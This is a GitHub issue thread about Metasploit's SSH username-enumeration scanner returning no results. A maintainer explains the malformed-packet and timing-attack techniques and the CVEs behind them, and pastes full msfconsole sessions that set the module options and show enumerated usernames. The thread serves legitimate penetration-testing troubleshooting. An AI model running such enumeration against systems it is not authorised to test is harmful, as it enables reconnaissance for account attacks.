rapid7 / metasploit-framework

Metasploit Framework
https://www.metasploit.com/
Other
34.08k stars 13.96k forks source link

auxiliary(scanner/ssh/ssh_enumusers) execution completes but produces no results #15676

Closed njmulsqb closed 2 years ago

njmulsqb commented 3 years ago

Hi,

I am running this auxiliary(scanner/ssh/ssh_enumusers) module to enumerate usernames on a SSH target but it is completing execution without producing any result or telling whether the target is vulnerable or not or usernames can be enumerated or not. The execution looks something like this

` [] 1.2.3.4:443 - SSH - Using malformed packet technique [] 1.2.3.4:443 - SSH - Checking for false positives [] 1.2.3.4:443 - SSH - Starting scan [] Scanned 1 of 2 hosts (50% complete) [] 1.2.3.4:443 - SSH - Using malformed packet technique [] 1.2.3.4:443 - SSH - Checking for false positives [] Scanned 1 of 2 hosts (50% complete) [] 1.2.3.4:443 - SSH - Starting scan [] Scanned 1 of 2 hosts (50% complete) [] Scanned 2 of 2 hosts (100% complete) [*] Auxiliary module execution completed

Note: The IP 1.2.3.4 is placed intentionally to replace the IP of a real target. `

bcoles commented 3 years ago

This module supports two actions:

https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/auxiliary/scanner/ssh/ssh_enumusers.rb#L45-L54

The module info outlines the techniques used by these actions:

https://github.com/rapid7/metasploit-framework/blob/b11237fea02f1c7a6776e35fedb6fb5df70a1033/modules/auxiliary/scanner/ssh/ssh_enumusers.rb#L14-L26

The Malformed Packet technique uses SSH_MSG_USERAUTH_REQUEST (CVE-2018-15473).

Only some SSH servers, such as OpenSSH, were affected. This technique will not work on unaffected SSH servers.

The vendor treated this behaviour as a bug and provided a patch (3 years ago). This technique will not work on patched systems.

This technique will not work on modules which do not have public key authentication enabled.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /root/Desktop/metasploit-framework/data/wordlists/unix_users.txt
USER_FILE => /root/Desktop/metasploit-framework/data/wordlists/unix_users.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 1.2.3.4
rhosts => 1.2.3.4
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using malformed packet technique
[*] 1.2.3.4:22 - SSH - Starting scan
[+] 1.2.3.4:22 - SSH - User '4Dgifts' found
[+] 1.2.3.4:22 - SSH - User 'abrt' found
[+] 1.2.3.4:22 - SSH - User 'adm' found
[+] 1.2.3.4:22 - SSH - User 'admin' found
[+] 1.2.3.4:22 - SSH - User 'administrator' found
[+] 1.2.3.4:22 - SSH - User 'anon' found
[+] 1.2.3.4:22 - SSH - User '_apt' found
[+] 1.2.3.4:22 - SSH - User 'arpwatch' found
[+] 1.2.3.4:22 - SSH - User 'auditor' found
[+] 1.2.3.4:22 - SSH - User 'avahi' found
[+] 1.2.3.4:22 - SSH - User 'avahi-autoipd' found
[+] 1.2.3.4:22 - SSH - User 'backup' found
[+] 1.2.3.4:22 - SSH - User 'bbs' found
[+] 1.2.3.4:22 - SSH - User 'beef-xss' found
[+] 1.2.3.4:22 - SSH - User 'bin' found
[+] 1.2.3.4:22 - SSH - User 'bitnami' found
[+] 1.2.3.4:22 - SSH - User 'checkfs' found
[+] 1.2.3.4:22 - SSH - User 'checkfsys' found
[+] 1.2.3.4:22 - SSH - User 'checksys' found
[+] 1.2.3.4:22 - SSH - User 'chronos' found
[+] 1.2.3.4:22 - SSH - User 'chrony' found
[+] 1.2.3.4:22 - SSH - User 'cmwlogin' found
[+] 1.2.3.4:22 - SSH - User 'cockpit-ws' found
[+] 1.2.3.4:22 - SSH - User 'colord' found
[+] 1.2.3.4:22 - SSH - User 'couchdb' found
[+] 1.2.3.4:22 - SSH - User 'cups-pk-helper' found
[+] 1.2.3.4:22 - SSH - User 'daemon' found
[+] 1.2.3.4:22 - SSH - User 'dbadmin' found
[+] 1.2.3.4:22 - SSH - User 'dbus' found
[+] 1.2.3.4:22 - SSH - User 'Debian-exim' found
[+] 1.2.3.4:22 - SSH - User 'Debian-snmp' found
[+] 1.2.3.4:22 - SSH - User 'demo' found
^C[*] Caught interrupt from the console...
[*] Auxiliary module execution completed

As per the module description:

Testing note: invalid users were logged, while valid users were not. YMMV. 

The module also supports a CHECK_FALSE option which can be used to eliminate false positives.

msf6 > use auxiliary/scanner/ssh/ssh_enumusers
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/users
USER_FILE => /tmp/users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set CHECK_FALSE
CHECK_FALSE => false
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set CHECK_FALSE true
CHECK_FALSE => true
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set rhosts 1.2.3.4
rhosts => 1.2.3.4
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using malformed packet technique
[*] 1.2.3.4:22 - SSH - Checking for false positives
[-] 1.2.3.4:22 - SSH - throws false positive results. Aborting.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 

The Timing Attack technique relies upon timed-based enumeration (CVE-2003-0190, CVE-2006-5229, CVE-2016-6210).

This is a generic technique which may or may not work on some SSH servers. Username enumeration via timing attacks is a common technique and an easy trap for developers to fall into - as demonstrated by multiple CVEs for OpenSSH. The most recent OpenSSH CVE (CVE-2016-6210) was patched 5 years ago.

it is completing execution without producing any result

You can set VERBOSE true for verbose output which prints each username as it is tested.

msf6 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing\ Attack
action => Timing Attack
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /tmp/users
USER_FILE => /tmp/users
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set VERBOSE true
VERBOSE => true
msf6 auxiliary(scanner/ssh/ssh_enumusers) > cat /tmp/users
[*] exec: cat /tmp/users

root
admin
test
guest
doesnotexist
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run

[*] 1.2.3.4:22 - SSH - Using timing attack technique
[*] 1.2.3.4:22 - SSH - Starting scan
[-] 1.2.3.4:22 - SSH - User 'root' not found
[-] 1.2.3.4:22 - SSH - User 'admin' not found
[-] 1.2.3.4:22 - SSH - User 'test' not found
[-] 1.2.3.4:22 - SSH - User 'guest' not found
[-] 1.2.3.4:22 - SSH - User 'doesnotexist' not found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/ssh/ssh_enumusers) > 

or telling whether the target is vulnerable or not or usernames can be enumerated or not.

The nature of timing attacks requires "known good" data and "known bad" data to contrast.

The correct way to determine whether the target is vulnerable is to successfully enumerate usernames. If usernames cannot be enumerated then the target is not vulnerable to username enumeration. If usernames are successfully enumerated then the target is vulnerable to username enumeration.

github-actions[bot] commented 2 years ago

Hi!

This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] commented 2 years ago

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.